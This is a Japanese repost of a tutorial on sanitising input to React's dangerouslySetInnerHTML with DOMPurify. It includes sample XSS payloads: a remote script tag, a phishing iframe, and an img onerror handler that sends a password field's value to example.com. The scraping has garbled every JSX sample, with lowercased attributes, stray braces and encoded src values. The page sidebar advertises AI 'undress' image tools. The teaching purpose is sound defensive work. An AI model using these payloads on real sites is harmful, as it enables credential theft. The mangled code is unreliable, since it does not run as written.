検索
ホームページウェブフロントエンドjsチュートリアルReact の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減する

React の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減する

DDD
DDD
Sep 13, 2024 am 06:35 AM

Mitigate XSS exploits when using React

ラウタロ・アンドレアニによるカバー画像

...

TL: DR; 危険な SetInnerHTML にコンテンツを盲目的にダンプすることは、まさに危険です。入力を明示的に制御できない限り、危険なことに、SetInnerHTML に渡す入力はすべてサニタイズしていることを確認してください。

次のコンポーネントは、危険な SetInnerHTML による XSS 攻撃のリスクを軽減する簡単な例として機能します。

//https://github.com/cure53/DOMPurify
import React from "react";
import DOMPurify from "dompurify";

const sanitize = (dirty) => DOMPurify.sanitize(dirty);

const DangerousHtml = ({ innerHTML, tag }) => {
  const clean = sanitize(innerHTML);

  if (typeof tag === "undefined") {
    return <div dangerouslysetinnerhtml="{{" __html: clean></div>;
  }
  return <tag dangerouslysetinnerhtml="{{" __html: clean></tag>;
};

export default DangerousHtml;

特注の DangerousHtml コンポーネントを使用することで、実際の危険な SetInnerHTML プロパティに到達する前に入力をサニタイズするため、XSS エクスプロイトのリスクを大幅に軽減できます

DOMPurify は高度な構成も可能であるため、特定のユースケースを処理したり、以下の例の一部を明示的に許可したりするために、この例のような複数のコンポーネントが必要になる場合があります。

以下に、エクスプロイトがどのように行われるかを示す簡単な例をいくつか示します。

iFrame および Script タグの悪用

React は悪意のあるペイロードを指すスクリプト タグを削除しないため、XSS が可能です。

この方法でも iFrame を渡すべきではありません。むしろ、URL とその他の「安全な」属性を小道具として渡し、それを iFrame タグでレンダリングしてレンダリング機能とソースの制御を保持するか、専用の iFrame コンポーネントを用意する必要があります。

たとえば、API リクエストから受け取った次の悪意のあるマークアップについて考えてみましょう。 dangerously SetInnerHTML を介して盲目的に設定すると、ユーザーに次の出力が表示されます:

// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
  Hi
  <script src="https://example.com/malicious-tracking"></script>
  Fiona, here is the link to enter your bank details:
  <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`,
  }}
/>






<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
  <p>
    Hi
    <script src="https://example.com/malicious-tracking"></script>
    Fiona, here is the link to enter your bank details:
    <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
  </p>
</div>

しかし、代わりに DangerousHTML コンポーネントを使用することは、ユーザーが直面する可能性のあるリスクのほとんどを軽減したことを意味します。

// Bad markup going in
<dangeroushtml innerhtml="{`<p">
  Hi
  <script src="https://example.com/malicious-tracking"></script>
  Fiona, here is the link to enter your bank details:
  <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`}
/>
</dangeroushtml>
<!-- Clean markup rendered on the DOM -->
<div>
  <p>Hi Fiona, here is the link to enter your bank details:</p>
</div>

フィオナは、何らかの理由で Web サイトが壊れているかコンテンツが欠落していると考えているかもしれませんが、銀行口座の詳細をフィッシングされるよりはまだマシです!

属性操作/中毒

一部の DOM 要素には、悪用される可能性がある特別な属性があり、それから身を守る必要があります。

この例では、 上でいくつかの JS を実行できます。タグにエラーがあります。

たとえば、次のような場合:

// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
  Hola
  <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="React の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減する" >
  Sharon
`,
  }}
/>






<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
  <p>
    Hola
    <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="React の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減する" >
    Sharon
  </p>
</div>

この例では、イメージリクエストが最終的に失敗し、ユーザーにはそれが分からないときに、毒されたマークアップが DOM からデータを盗んでいます。

DangerousHtml コンポーネントを使用すると、これを再度軽減できます

// Bad markup going in
<dangeroushtml innerhtml="{`">
  Hola
  <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="React の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減する" >
  Sharon
`}
/>
</dangeroushtml>
<!-- Clean markup rendered on the DOM -->
<div>
  <p>
    Hola
    <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" alt="React の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減する" >
    Sharon
  </p>
</div>

フォールバック画像を表示するために本当に JS を実行したいかもしれないという議論を考えると、これを行うために生のサニタイズされていない HTML を信頼すべきではなく、fallbackImageURL または onError プロパティを用意した方がよいでしょう。次のようにイメージタグに明示的に追加できます:

// Usual imports
const MyImageComponent = ({ fallbackUrl, url }) => {
  // Usual component setup

  const displayFallbackImage = (evt) => {
    // If there is no fallback, do nothing
    if (!fallbackUrl) return;

    // set the url to the fallbackUrl
    evt.target.src = fallbackUrl;
  };

  return (
    <img  src="%7Burl%7D" onerror="{displayFallbackImage}" ... any other props alt="React の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減する" >
  );
};

...

元の記事: https://timbryan.dev/posts/react-xss-via-dangerouslySetInnerHtml

以上がReact の「危険な SetInnerHTML」使用時の XSS エクスプロイトを軽減するの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
関連記事
Java vs JavaScript:開発者向けの詳細な比較Java vs JavaScript:開発者向けの詳細な比較May 16, 2025 am 12:01 AM

Javaandjavascriptaredistinctlanguages:javaisusedforenterpriseandmobileapps、whilejavascriptisforinteractivewebpages.1)javaiscompiled、staticatically、andrunsonjvm.2)javascriptisisterted、dynamsornoded.3)

JavaScriptのデータ型:ブラウザとNodejsに違いはありますか?JavaScriptのデータ型:ブラウザとNodejsに違いはありますか?May 14, 2025 am 12:15 AM

JavaScriptコアデータ型は、ブラウザとnode.jsで一貫していますが、余分なタイプとは異なる方法で処理されます。 1)グローバルオブジェクトはブラウザのウィンドウであり、node.jsのグローバルです2)バイナリデータの処理に使用されるNode.jsの一意のバッファオブジェクト。 3)パフォーマンスと時間の処理にも違いがあり、環境に従ってコードを調整する必要があります。

JavaScriptコメント://および / * *を使用するためのガイドJavaScriptコメント://および / * *を使用するためのガイドMay 13, 2025 pm 03:49 PM

javascriptusestwotypesofcomments:シングルライン(//)およびマルチライン(//)

Python vs. JavaScript:開発者の比較分析Python vs. JavaScript:開発者の比較分析May 09, 2025 am 12:22 AM

PythonとJavaScriptの主な違いは、タイプシステムとアプリケーションシナリオです。 1。Pythonは、科学的コンピューティングとデータ分析に適した動的タイプを使用します。 2。JavaScriptは弱いタイプを採用し、フロントエンドとフルスタックの開発で広く使用されています。この2つは、非同期プログラミングとパフォーマンスの最適化に独自の利点があり、選択する際にプロジェクトの要件に従って決定する必要があります。

Python vs. JavaScript:ジョブに適したツールを選択するPython vs. JavaScript:ジョブに適したツールを選択するMay 08, 2025 am 12:10 AM

PythonまたはJavaScriptを選択するかどうかは、プロジェクトの種類によって異なります。1)データサイエンスおよび自動化タスクのPythonを選択します。 2)フロントエンドとフルスタック開発のためにJavaScriptを選択します。 Pythonは、データ処理と自動化における強力なライブラリに好まれていますが、JavaScriptはWebインタラクションとフルスタック開発の利点に不可欠です。

PythonとJavaScript:それぞれの強みを理解するPythonとJavaScript:それぞれの強みを理解するMay 06, 2025 am 12:15 AM

PythonとJavaScriptにはそれぞれ独自の利点があり、選択はプロジェクトのニーズと個人的な好みに依存します。 1. Pythonは、データサイエンスやバックエンド開発に適した簡潔な構文を備えた学習が簡単ですが、実行速度が遅くなっています。 2。JavaScriptはフロントエンド開発のいたるところにあり、強力な非同期プログラミング機能を備えています。 node.jsはフルスタックの開発に適していますが、構文は複雑でエラーが発生しやすい場合があります。

JavaScriptのコア:CまたはCの上に構築されていますか?JavaScriptのコア:CまたはCの上に構築されていますか?May 05, 2025 am 12:07 AM

javascriptisnotbuiltoncorc;それは、解釈されていることを解釈しました。

JavaScriptアプリケーション:フロントエンドからバックエンドまでJavaScriptアプリケーション:フロントエンドからバックエンドまでMay 04, 2025 am 12:12 AM

JavaScriptは、フロントエンドおよびバックエンド開発に使用できます。フロントエンドは、DOM操作を介してユーザーエクスペリエンスを強化し、バックエンドはnode.jsを介してサーバータスクを処理することを処理します。 1.フロントエンドの例:Webページテキストのコンテンツを変更します。 2。バックエンドの例:node.jsサーバーを作成します。

See all articles

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

Video Face Swap

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

もっと見る

人気の記事

<🎜>:庭を育てる - 完全な突然変異ガイド
4週間前ByDDD
<🎜>:バブルガムシミュレーターインフィニティ - ロイヤルキーの取得と使用方法
1 か月前By尊渡假赌尊渡假赌尊渡假赌
Nordhold:Fusion System、説明
1 か月前By尊渡假赌尊渡假赌尊渡假赌
マンドラゴラ:魔女の木のささやき - グラップリングフックのロックを解除する方法
4週間前By尊渡假赌尊渡假赌尊渡假赌
Clair Obscur:Expedition 33 UE-Sandfallゲームクラッシュ? 3つの方法!
2週間前ByDDD
もっと見る

ホットツール

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

VSCode Windows 64 ビットのダウンロード

VSCode Windows 64 ビットのダウンロード

Microsoft によって発売された無料で強力な IDE エディター

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

強力な PHP 統合開発環境

もっと見る

ホットトピック

Java チュートリアル
1677
14
CakePHP チュートリアル
1431
52
Laravel チュートリアル
1334
25
PHP チュートリアル
1280
29
C# チュートリアル
1257
24
もっと見る